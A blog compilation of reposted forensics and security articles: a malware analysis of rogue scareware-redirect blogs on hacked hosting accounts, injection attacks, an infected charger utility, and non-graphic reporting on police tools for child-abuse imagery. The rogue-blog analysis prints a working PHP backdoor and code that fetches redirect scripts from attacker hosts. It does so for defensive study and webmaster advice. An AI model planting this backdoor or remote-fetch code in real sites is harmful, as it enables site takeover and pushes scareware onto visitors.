Leonardo Musumeci

A potential new forensic:

To determine how similar a person’s fingertip bacteria are to bacteria left on computer keys, the team took swabs from three computer keyboards and compared bacterial gene sequences with those from the fingertips of the keyboard owners.

Today in the Proceedings of the National Academy of Sciences, they conclude that enough bacteria can be collected from even small surfaces such as computer keys to link them with the hand that laid them down.

The researchers then tested how well such a technique could distinguish the person who left the bacteria from the general population. They sampled bacteria from nine computer mice and from the nine mouse owners. They also collected information on bacterial communities from 270 hands that had never touched any of the mice. In all nine cases, the bacteria on the mice were far more similar to the mouse-owners’ hands than to any of the 270 strange hands. The researchers also found that bacteria will persist on a computer key or mouse for up to 2 weeks after it has been handled.

Here’s a link to the abstract; the full paper is behind a paywall.

Source: Identifying People by their Bacteria

Back in November, I wrote about rogue blogs created in subdirectories of legitimate websites. The blogs poisoned Google search results for millions of relatively unpopular keywords (the long tail) redirecting visitors to scareware websites. This hack mainly affected sites hosted on Servage network.

Recently I’ve been contacted by one of Servage clients who found his sites hacked:

I noticed the anomalous traffic to domains that are essentially either completely parked or just used for email addresses (SMTP forwarding rather than anything ‘clever’ with webmail.) That led me to the file structures and a quick google led me to your site.

He sent me the offending files he found under his account (thanks Matthew). Now I can share my analysis of the files with you.

In my previous post, I speculated about the internal structure of the rogue blogs. Now that I have the files, I can say that all my guesses proved to be correct.

Blog engine

Indeed, a full-featured yet minimalistic PHP blog engine powers the rogue blogs.

The whole engine consists of only 4 files:

• index.php – main file of the engine. Less than 500 lines of PHP code. Less than 18K bytes on disk.
• template.php – template of web pages that uses the data provided by the index.php. About 20 Kbytes.
• categories.dat – serialized blog categories.
• .htaccess – rewrite rules to support SEO-friendly URLs.

And this engine is indeed anonymous. I couldn’t find any credits. No names, not licenses. Just the code. The only clue I found was this User-Agent string of the ping requests: WeirD blog engine.

Features

The engine can do pretty much everything you expect a blog engine should be able to do.

• add/remove entries
• break down entries by categories
• display entries in chronological order
• support SEO-friendly URLs
• notify services like Ping-O-Matic, Technorati, Google Blogsearch, Weblogs about new posts.
• provide RSS feeds
• support trackbacks
• support custom templates

Flat files

The entries (there are hundreds of them) are stored in flat .txt files in the same directory. This makes the engine database-independent, so it can work on most servers. The only requirements are:

• PHP
• sufficient directory permissions to create files
• Apache (to use SEO-friendly URLs)

Here’s a sample content of one of such text files (blonde-avril-lavigne.txt):

blonde avril lavigne
<img src="http://lh5.ggpht.com/elaing.zhang/SNxxYg5W9iI/AAAAAAAAUzE/Y75n9lb2xmg/s800/avril-lavigne80926003.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://lh3.ggpht.com/elaing.zhang/SNxxYxT7YwI/AAAAAAAAUzM/CZ832w22_Go/s800/avril-lavigne80926004.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://images.teamsugar.com/files/users/2/20652/34_2007/76335776.preview_0.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://www.judiciaryreport.com/images/avril-lavigne-pic.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />
<img src="http://static.desktopnexus.com/wallpapers/4138-bigthumbnail.jpg" alt="blonde avril lavigne" title="blonde avril lavigne" />

As you can see the files are straight forward. The title on the first line followed by the content. In our case the content is five images (Google Image search results for corresponding keywords).

.htaccess

Since the purpose of the rogue blogs is poisoning of search results, “SEO-friendly” URLs is a required feature of the blog engine. This engine uses Rewrite rules in .htaccess files.

RewriteEngine On
RewriteRule ^category/([^/\.]+)/?$ index.php?category=$1 [L]
RewriteRule ^category/([^/\.]+)/page/([0-9]+)/?$ index.php?category=$1&page=$2 [L]
RewriteRule ^download/([^/\.]+)/?$ download.php?id=$1 [L]
RewriteRule ^page/([0-9]+)/?$ index.php?page=$1 [L]
RewriteRule ^([^/\.]+)/?$ index.php?id=$1 [L]
RewriteRule ^rss20.xml$ index.php?action=rss [L]

Malicious features

What makes these blogs malicious is following modifications to the original engine.

css.js

All blog pages contain the following script tag:

<script type="text/javascript" src="'.$blog['homepageUrl'].'css.js"></script>

The script redirects visitors that come from search engines to scareware sites. The content of this script constantly changes, redirecting people to new, not yet blacklisted sites. Here is how they do it behind the scenes:
function get_js_file($filename) {
if (!file_exists($filename) or time() - filemtime($filename) > 3600) {
$js_file = @file_get_contents('hxxp://t.xmlstats .in/b-m-2/'.$filename);
if (!$js_file) { $js_file = @file_get_contents('hxxp://t.jsonstats .in/b-m-2/'.$filename);}
if ($js_file) { @file_put_contents($filename, $js_file);}
}}

As you can see, this code tries to update the css.js file downloading its new content from hackers’ sites: t.xmlstats .in, t.jsonstats .in and, in some versions of the engine, t.jsstats .in.

This is how hackers make sure their blogs always redirect to currently active scareware sites.

Anti-Googlebot

Another modification is the code that detects requests from Google’s network checking the IP address against known Google’s IP ranges. If a request from Google is detected, the css.js file is replaced with css.google.js. This way hackers try to hide the malicious redirects from Googlebot when it indexes the rogue blogs. And the fact that I can see many such blogs in Google search results without any warnings shows that this simple trick does its job.

Different generations

In November, I discovered that there had been several different generations of the rogue blogs. Checking the files I received from Matthew, I found those generations sitting in separate subdirectories: blog, bmblog, bmsblog.

Backdoor script

Another interesting file I received is the index.php above the directories with rogue blogs:

<?php
error_reporting(E_ALL);
if (md5($_POST['5758e26e']) == '068f4646e8e1aefcdcd184e31e33af47') {
$test_func = create_function('', urldecode($_POST['f']));
$test_func();
}
?>

This is a typical backdoor script that executes whatever PHP code hackers send in parameters of POST requests.

Apparently, this script was used to create all other rogue files and directories. The question is how this backdoor script got there in the first place.

When Matthew asked Servage about what happened to his sites, they accused him of using insecure scripts, despite of the fact that his site didn’t use any scripts at all.

As I showed in my previous post, 85%+ of discovered rogue blogs are hosted by Servage so I’m almost sure some Servage-specific security hole was used. (Pure speculation: For example, it could be some php shell that hackers used to finds user accounts with writable directories. And the internal Servage architecture might help this script propagate to different physical servers. )

Still active

While the first generation of these rogue blogs appeared in April of the last year, this attack is still active. I can still see quite a few rogue bmsblog blogs with dates of the most recent posts in March of 2010. And some of them (not all though) can be found via Google search inurl:bmsblog/category 2010.

To Webmasters

While this particular attack mainly affects clients of Servage hosting company, it is quite typical for hacks that try to create rogue web pages in compromised web sites. So the following advice should be useful for most webmasters.

1. Make sure your server directories are only writable to you. This is especially important in shared hosting environment where hackers can use a compromised neighbor account to find writable directories in the rest sites on the same server and then create rogue content there.

2. Regularly scan your server for any suspicious files and directories.

3. Regularly check raw server logs. You may find requests to files that shouldn’t be there.

4. Pay special attention to POST requests. They are very popular for backdoor scripts. Just compile a list of files accessed via POST requests and check if you recognize any of them.

5. Many shared hosting plans include Webalizer. Every now and then check its reports. While they are normally not as useful as Google Analytics reports, they have one important advantage over Google Analytics – they track all files under your account, not only those where you inserted a tracking code. So, in Webalizer, you can see requests to files created by hackers, while Google Analytics completely misses this sort of data.

6. Hackers usually create rogue web pages to poison Google search results. So it’s natural to use Google to detect this sort of hacks. Regularly use Google to check what is indexed on your site. Use the site:you_site_domain.com search command.

7. Regularly check reports in Google Webmaster Tools. They may also reveal suspicious activity. Useful reports: Top search queries, Keywords, Links to your site.

8. If you find new directories with rogue files, disallow them in robots.txt. This will show Google that you don’t want those directories to be indexed. Otherwise, even if you delete the files, Google may keep them in index for quite some time (who knows, maybe you removed them temporarily while, say, redesigning your site).

For example, if you find rogue files in /cgiproxy/bmsblog/ the robots.txt should be:
User-agent: *
Disallow: /cgiproxy/bmsblog/

9. And don’t forget about other types of hacks that mess with your existing files. Regularly check your site for consistency and any illicit content that hackers may inject into your web pages (this is where my Unmask Parasites service can help).

Call for information

This case is not completely investigated yet. For example, I still don’t know why it mainly hits Servage and how exactly it propagates. This information could help Servage clients prevent infection of their sites. And probably guys at Servage need this information too since it looks like they can’t stop this attack themselves (and it’s active for about a year now!!!)

And if you have interesting information about any other hacker attack, please share it with me and readers of this blog. I’m always looking for malicious files that webmasters find on their compromised servers. They can tell a lot about how the attacks work. So before deleting any offending content, consider contacting me first.

Thanks for reading this blog. Your comments are welcome.

Related posts:

• Rogue blogs regirect search traffic to bogus AV sites. Part 1
• Rogue blogs redirect search traffic to bogus AV sites. Part 2
• Bety.php – osCommerce Hack. Part 1.
• Bety.php Hack. Part 2. Black Hats in Action.

Source: Internals of Rogue Blogs

Over the past few years, attacks against web applications have become more prevalent and sophisticated. There are several methods of attacking web applications, SQL injection being one of the more well-known. In this article, we are going to discuss a different class of attacks and a few examples of how an incident responder or computer forensic investigator might spot them.

All web forms contain fields that are used to grab input from a user and post it to the server for processing. Form fields are commonly used to collect information, from transaction details on ecommerce sites to authentication credentials for restricted content. While form fields are used to collect data legitimately from users, they can also be used maliciously.

An example of this is a client side attack commonly known as form field injection. In this type of attack, malware interacting in a web browser adds additional form fields to valid form fields on a web page (search for BHO html injection). The purpose of injected fields is to trick users into revealing sensitive personal information like passwords, ATM PINs, and credit card numbers. This information is captured and transmitted to remote drop sites where it can be used to perpetrate identity theft or fraud. Several classes of malware are capable of performing this kind of attack, including the widely used ZeuS.

HTML injection attacks take form field injection one step further. Instead of inserting a form field into a web page, HTML injection replaces legitimate HTML coming from the server, similar to a “cut and paste” function. The replaced HTML is overwritten by the attacker’s HTML and the original, intended content is never rendered by the web browser. This type of attack can be used to alter the logical flow of a web application. For example, legitimate data on a web page, like an account summary, can be replaced by a form asking for a username and password. After data is entered into the form, the legitimate data will be properly displayed. This may look like an additional level of authentication, tricking a user into entering credentials which are captured like the form field injection attack described above.

Why is this information important to incident response and digital forensic professionals? Both of these attacks are client side attacks. When investigating web application compromises, investigators may not have access to the client side computer. However, since injected fields are part of a web form, they may be transmitted in the POST request along with legitimate fields on the page back to the server. These artifacts may appear as anomalous data in the server logs. For example, a username field appearing on a POST other than from a legitimate login page should be investigated further.

In summary, being aware of current attacks, how they are preformed, and the resulting artifacts or signatures they may leave behind can be a great benefit to an investigator. By knowing of and looking for these signs, investigators can recognize and respond to incidents faster, resulting in less impact to the organization/agency. It gets back to the old adage of knowing your system, data, flows, etc. Focus on any abnormal deviation from these legitimate patterns as they may be a tipoff that an incident has occurred.

Chris Silveira manages the CSIRT and Paul Yacovetta is a forensic engineer at a financial institution.

Source: Client-side Web Application Attacks

It looks like it’s time to remind everyone that malware isn’t just something you download from the internet, or find attached to an email, or even discover lurking on a CD. Any time you plug a storage device into your computer you are potentially exposing it to any malicious code which might reside on the unit.

So, that means that you have to be conscious that all sorts of items can carry malware, and could transmit it to your laptop or desktop computer if you attach it. It doesn’t matter if it’s an iPod, a BlackBerry, a sat-nav, or a digital photo frame.

If it’s got the ability to store data, it can store malware too.

The latest warning comes from US-CERT, who advise that software that comes with the Energizer DUO USB NiMH battery charger is infected with a backdoor Trojan horse, capable of infecting Windows PCs.

Sophos detects the Trojan horse as Troj/Bckdr-RBF.

It’s not yet known how the software, which is designed to display a battery’s charge level, became infected. It’s clear, however, that a more stringent quality control procedure might have saved consumers’ computers and Energizer’s blushes.

Read more information in the advisory from US-CERT.

Update: There appears to be some confusion about whether the Energizer DUO USB NiMH battery charger shipped with the infected software, or whether it was made available by Energizer separately.

Clu-blog reader Kurt Wismer (who knows a thing or two about malware) says he has one of these Energizer chargers and it didn’t come packaged with malware-infected software.

Either way, be careful out there!

Source: Bad Bunny! Energizer USB battery charger blamed for backdoor

Some crimes, like the rape and torture of infants and toddlers, are so unspeakable the reaction of most people is to turn away and hope the problem vanishes.

Forensic analysts, however, must face this dark reality in the pursuit of prosecutions. The scope of the problem is immense.

The Internet enables instant access to child pornography. The National Center for Missing and Exploited Children (NCMEC) reports it has reviewed 23 million child pornography images and videos—8.6 million just in 2008.

As the problem spreads, the victims seem to get younger and younger. According to the 2008 Internet Watch Foundation (IWF) Annual Report, 69% of child victims are under ten years old, and 24% are six years old or younger. Some are babies.

Both IWF and NCMEC are active in helping forensic scientists build cases against those who produce, distribute, and consume child pornography. Two new software tools, one developed at Oak Ridge National Laboratory and the other in Sweden, appeared this summer to help them and others involved in this pursuit. Both packages are designed to automate some of the grim forensic tasks of fighting child pornography.

The Swedish system, called NetClean Analyze, is an investigative tool for individual law enforcement agencies working with images and videos of child sexual abuse.
Developed for the Swedish National Police, NetClean Analyze uses unique image recognition techniques to speed up the process of analyzing and classifying images and videos. The system, which is currently in use throughout the European law enforcement community, can rapidly catalog the hundreds of thousands of images and videos that are typically found during an investigation of computers confiscated from suspected child pornography traffickers.

Before NetClean Analyze, forensic examiners had to manually view and catalog each image or video, which significantly slowed down the forensic process.

NetClean Analyze focuses on three key issues. It minimizes the time investigators have to spend looking at old or duplicate images and videos, it eases collaboration between police units, and it enables more efficient reporting with an engine that allows easy creation of either customized or standardized reports.
Aside from automatic categorization, NetClean isolates duplicate files, which saves time.
“It’s not unusual for duplicates to reduce the number of images in a case from perhaps 350,000 to 80,000, saving a tremendous amount of analytical time,” said Christian Sjöberg, CEO of NetClean Technologies, Göteborg, Sweden.

The system can also find images similar to an image in question.

“Since child abuse images usually come in series, if you select an image and ask the system to show similar images, the system will find the whole series related to the first image with one click,” Sjöberg said. “This is useful to investigators who may have an image they are uncertain of. They can ask the system to find similar photos, one that may be clearly child abuse.”

After all files have been analyzed and catalogued, the investigator can then produce a detailed report formatted for prosecutorial purposes, along with sample images.

Global Technology Solutions (Hollywood, Florida) holds the North American rights to NetClean and has made the system available to law enforcement agencies at no cost, per agreement with the Swedish developer.
The initial NetClean installation in the U.S. was in Florida, in September, at the Broward County Sheriff’s Office, where it is currently being fine tuned for actual field work.
“We will then make it available to other law enforcement agencies,” said Chris Cavallo, president of Global Technology Solutions.

Any police department interested in obtaining a copy of the software can contact GTS headquarters in Hollywood, Florida, at 954-981-2600, or through the company website, www.gtsna.com.

One of the strengths of NetClean is the massive central database of child pornography material already known, making it possible, and quite simple, to match newly confiscated material against the database to identify new images or videos.
“The more agencies that have the system and use it, the more complete our image database will be, and that makes catching child pornographers and trying their cases easier,” Cavallo said.

Oak Ridge System
The Oak Ridge system also employs software to rapidly and thoroughly scan hard drives on confiscated computers, dramatically reducing the amount of time necessary to scan a computer, potentially reducing forensic analysis backlogs.
“We’re combining network text and image analysis tools to rapidly find the worst of the worst child pornography offenders,” said Tom Potok, of ORNL’s Computational and Engineering Science Division.

The worst of the worst in this case being the deviant predators that sexually rape, abuse, and torture children, many of whom are infants and toddlers.
Potok said with his system, as yet unnamed, there is a good chance that the number of prosecutions of these offenders could double.
Potok said the Oak Ridge system, which won a 2007 R&D 100 award, differs from NetClean in that his system works by analyzing both images, videos, and text, whereas NetClean analyzes images and videos only.

“Our work is also applicable to peer-to-peer file sharing networks, not just hard drives,” he said.
The idea is that by finding child pornography text and images on the same computer there is a higher likelihood of finding someone who is actually abusing a child and sharing the images or video, rather than perhaps being merely a consumer of the vile product.

A prototype of the Oak Ridge system was deployed in September for live beta testing at the Knoxville Internet Crimes Against Children Task Force. A second prototype has also been deployed at the same organization. The second one helps identify missing children by comparing faces in child pornography images to missing children databases.

Google
When it comes to searching text or images, no one is more adept than Google, which last year announced a partnership with NCMEC to provide software designed to automate the technical assistance NCMEC provides to police child pornography investigations.
It’s the latest iteration of the NCMEC offensive of fighting fire with fire.
“Criminals are using cutting edge technology to commit their crimes of child sexual exploitation, and in fighting to solve those crimes and keep children safe, we must do the same,” said Ernie Allen, president and CEO of NCMEC.

Analysts with NCMEC’s Child Victim Identification Program have reviewed more than 15 million child pornography images and videos in an attempt to identify and rescue children. NCMEC analysts typically review something like 200,000 images a week.
Now, with the automated Google system, colloquially called the Bedspread Detector, NCMEC analysts will be able to more quickly and easily search NCMEC’s systems to sort and identify files that contain images of child pornography victims.
The system is named ‘Bedspread Detector’ because one NCMEC analyst noticed the same bedspread in several different images with different victims.

“She was able to tie together the abuse of two little girls, one blonde, the other brunette, because the perpetrator was abusing them on the same distinctive bedspread,” Allen said.
Google’s ‘Bedspread Detector’ system now enables analysts to identify unique features, such as a distinctive bedspread, background photo, tattoo, or potted plant, then search against a vast database of other images containing that particular feature.
“This will help us identify more victims and link victims to particular perpetrators because most of them offend against multiple children,” Allen said.
Google encourages its employees to devote 20% of their work time to worthwhile social projects. In this case, four Google software engineers spent a year developing this new tool.
Details of exactly how the system works are not being disclosed, nor is how it specifically helps rescue children. What NCMEC will say is that what Google is doing is not just aiding prosecution, it is helping identify and rescue children.
“While there won’t be miraculous changes overnight, the bottom line is, because of these tools, we’re making headway,” Allen said.

Other Tools
Allen has other tactics that are paying off in the anti-child pornography campaign. In 2006, NCMEC was instrumental in forming the Financial Coalition Against Child Pornography (FCACP), a groundbreaking alliance between private industry and the public sector in the child porn battle.

Consumers of child pornography were once able to use traditional payment tools, such as credit cards, as well as new, alternative payment schemes like PayPal, to purchase child pornography on the Internet. The mission of the FCACP is to follow the flow of funds and shut down the payments accounts used by these illicit enterprises.
The alliance is composed of leading banks, credit card companies, electronic payment networks, third party payments companies, and Internet services providers, representing nearly 90% of the domestic payment industry.
“We’ve been doing this three years, and we’ve virtually eliminated the use of the credit card to purchase access to child pornography sites,” he said. The operators of these sites are being forced to develop other payment methods. Allen said some are establishing their own payment mechanisms or are using third parties. Most no longer accept U.S.- or UK-issued bank cards.
Another sign of progress is the price points of this perverse content have increased dramatically. In some cases, what once cost $29.95 a month for access to a child pornography site now costs $800 to $1,000, according to Allen.

Law enforcement reports that the number of operators of these illegal sites has decreased substantially to no more than a handful, most of which are believed to be operated by Eastern European organized crime syndicates.
“We’ve made it more expensive for these people to do business,” Allen said. “We’ve increased the risk.We’ve limited the payment options and virtually stopped the use of mainstream credit card usage.”
But, he’s realistic. He knows people who make money from the sexual exploitation of children will adapt.
“They’ll come up with other ways to collect, so we follow the money,” he said. “As they develop new mechanisms, we’ll try to attack those.”

Douglas Page writes about forensic science and medicine from Pine Mountain, California. He can be reached at douglaspage@earthlink.net.

Source: To Catch a Child Predator